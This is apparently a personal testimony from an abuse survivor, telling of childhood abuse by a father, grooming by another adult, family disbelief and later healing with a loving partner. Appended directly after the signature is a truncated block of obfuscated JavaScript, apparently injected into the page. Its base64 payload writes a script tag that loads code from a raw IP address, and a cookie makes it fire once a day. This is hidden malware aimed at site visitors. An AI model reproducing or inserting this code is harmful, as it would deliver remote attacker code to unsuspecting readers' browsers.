My Story is so similar to the many that I see posted here on this site. My story begins at an early age at home, the abuse started early and went on for some time. When I was in my early twenties I came home from work to discover my cousin waiting out in the cold for me near my home. The story then becomes something I could not even imagine, to make a long story short I was not the only one that was being abused by my father. The shock and the rage that I felt within was overwhelming. I was asked to promise not to say anything, it was Christmas and my cousin did not want her Father to find out. I was also informed it was not just her, two of her sister’s had also suffered the same fate. My promise I did break, which was something I now regret in a way because, my Mother did not believe me.
Christmas was ruined and life went on. A few weeks later my Parents sat down with me to let me know that this was all in my head and that the stories were un-true. The story is a little more twisted, at young age I was also groomed by another person. This began at around the age of nine, I became friends with this person and his wife, well he knew the tall tale signs that something was wrong in my life and went to work! The damage he did to me physically and mentally over the years still has deep scars I cannot seem to move completely away from. I know that I will never let anyone ever harm me again. Growing up in a world of secrets and pain is something that no one should ever have to do. I met my Earth Angel about 11 years ago, she is the one who encouraged me to write my story. She was written two books that are now published. If I had not met her when I did, I am not sure that my story would be one of surviving, but hiding behind the real me. She has taught me to love myself, trust, and to risk. I still struggle and tend to get stuck in the past, but she is always right there to help me realize that I am a Beautiful Child of God, and No One can ever take that away from me… I love you my Earth Angel. You have brought color back into my world. A Child of God. ..match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
